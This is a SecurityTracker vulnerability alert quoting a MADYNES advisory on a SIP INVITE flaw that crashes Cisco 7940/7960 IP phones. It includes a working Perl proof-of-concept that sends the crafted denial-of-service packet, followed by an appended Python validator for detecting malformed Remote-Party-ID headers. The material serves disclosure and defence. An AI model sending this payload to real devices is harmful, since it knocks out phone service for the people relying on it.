

 


Category:   Device (VoIP/Phone/FAX)  >   Cisco IP Phones
Vendors:   Cisco
Cisco 7940/7960 IP Phones Can Be Crashed With a SIP INVITE Message
SecurityTracker Alert ID:  1017797
SecurityTracker URL:  http://securitytracker.com/id/1017797
CVE Reference:   CVE-2007-1542
Updated:  Mar 26 2007
Original Entry Date:  Mar 20 2007
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): Model 7940/7960, with firmware P0S3-07-4-00
Description:   A vulnerability was reported in the Cisco 7940/7960 IP Phones. A remote user can cause denial of service conditions.

The phone does not properly validate the user-supplied sipURI field in the Remote-Party-ID value of a SIP INVITE message. A remote user can send a specially crafted SIP INVITE message to cause the target device to crash.

Humberto J. Abdelnur, Radu State, and Olivier Festor of the Madynes research team at INRIA Lorraine discovered this vulnerability using the Madynes VoIP fuzzer.

Impact:   A remote user can cause the target phone to crash.
Solution:   The vendor has issued a fixed version (firmware POS8-6-0; 8.6(0)), available at:

http://www.cisco.com/pcgi-bin/tablebuild.pl/sip-ip-phone7960?psrtdcat20e2

The Cisco advisory is available at:

http://www.cisco.com/warp/public/707/cisco-sr-20070320-sip.shtml

Vendor URL:  www.cisco.com/warp/public/707/cisco-sr-20070320-sip.shtml
Cause:   Exception handling error, Input validation error

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] CISCO Phone 7940 DOS vulnerability

MADYNES Security Advisory 


http://madynes.loria.fr



Severity: High

Title: Cisco 7940 SIP INVITE remote DOS 

Date: February 19, 2007

ID: KIPH2


Synopsis: After sending a crafted INVITE message the device immediately
reboots. The phone does not check properly the sipURI field of the
Remote-Party-ID in the message.

The vendor was informed and acknowledged the vulnerability. This
vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer.


Background: SIP is the IETF standardized (RFCs 2543 and 3261) protocol
for VoIP signalization. SIP is ASCII based; an INVITE message is used to
initiate and maintain a communication session.


Affected devices: Cisco phone 7940/7960 running firmware P0S3-07-4-00


Unaffected: devices running firmware POS8-6-0



Proof of Concept Code: 


#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);


$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

Proto=>'udp',

PeerAddr=>$ARGV[0]);


$msg="INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;branch=z9hG4jk\r\nFrom: sip:chirimolla
\@192.168.1.2;tag=qwzng\r\nTo: <sip:$ARGV[2]\@$ARGV[0];user=ip>\r
\nCall-ID: fosforito\@192.168.1.1\r\nCSeq: 921 INVITE\r
\nRemote-Party-ID: csip:7940-1\@192.168.\xd1.7\r\n\r\n";

$socket->send($msg);



Description: After receiving one crafted SIP INVITE message, the
affected device reboots immediately. The proof of concept code can be
used to demonstrate the vulnerability.



Impact 

A malicious user can remotely crash and perform a denial of service
attack by sending one crafted SIP INVITE message. This is conceptually
similar to the “ping of death”. 


Resolution:

Fixed software is available from the vendor and customers following
recommended best practices (i.e. segregating VOIP traffic from data) will
be protected from malicious traffic in most situations.







Credits:

Humberto J. Abdelnur (Ph.D Student)

Radu State (Ph.D)

Olivier Festor (Ph.D)

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer.

http://madynes.loria.fr/




Information about us: Madynes is a research team at INRIA Lorraine
working on VoIP Security assessment, intrusion detection and prevention.

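A defensive check for the flaw described above, as an added example that is not part of the SecurityTracker entry or the MADYNES advisory: it validates the URI in every Remote-Party-ID header of a raw SIP message, so a border element or sensor can drop or alert on malformed values before they reach a phone. The function names, the strict URI allow-list and the sample message are assumptions made for this example.

```python
import re

# Assumption: a deliberately strict allow-list, narrower than the RFC 3261
# grammar: sip/sips scheme, optional user part, hostname or IPv4, optional port.
URI_RE = re.compile(
    rb"(?i)^sips?:(?:[a-z0-9\-_.!~*'()&=+$,?/%]+@)?"
    rb"(?P<host>[a-z0-9](?:[a-z0-9\-.]*[a-z0-9])?)(?::(?P<port>\d{1,5}))?$")

def remote_party_ids(raw: bytes):
    """Return the value of every Remote-Party-ID header in a raw SIP message."""
    head = re.sub(rb"\r\n[ \t]+", b" ", raw.split(b"\r\n\r\n", 1)[0])  # unfold
    out = []
    for line in head.split(b"\r\n")[1:]:           # skip the start line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"remote-party-id":
            out.append(value.strip())
    return out

def uri_findings(value: bytes):
    """Return the reasons a Remote-Party-ID URI is rejected (empty list = ok)."""
    m = re.search(rb"<([^>]*)>", value)            # name-addr form, if present
    uri = (m.group(1) if m else value).split(b";", 1)[0].strip()
    findings = []
    if any(b < 0x21 or b > 0x7E for b in uri):
        findings.append("non-ASCII or control byte in URI")
    m = URI_RE.match(uri)
    if not m:
        return findings + ["not a well-formed sip/sips URI"]
    host = m.group("host")
    if re.fullmatch(rb"[\d.]+", host):             # looks like dotted decimal
        octets = host.split(b".")
        if len(octets) != 4 or any(not o or int(o) > 255 for o in octets):
            findings.append("invalid IPv4 host")
    if m.group("port") and int(m.group("port")) > 65535:
        findings.append("port out of range")
    return findings

def should_drop(raw: bytes) -> bool:
    """True if any Remote-Party-ID header in the message fails validation."""
    return any(uri_findings(v) for v in remote_party_ids(raw))

def sample_invite(rpid: bytes) -> bytes:
    """Constructed test message (documentation addresses), not a capture."""
    return (b"INVITE sip:alice@192.0.2.10 SIP/2.0\r\n"
            b"Via: SIP/2.0/UDP 192.0.2.20;branch=z9hG4bKexample\r\n"
            b"Call-ID: constructed@192.0.2.20\r\nCSeq: 1 INVITE\r\n"
            b"Remote-Party-ID: " + rpid + b"\r\n\r\n")
```

The check works on raw bytes rather than decoded text, so a byte outside printable ASCII is reported as a finding and not lost or replaced during decoding.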

 
 



Copyright 2019, SecurityGlobal.net LLC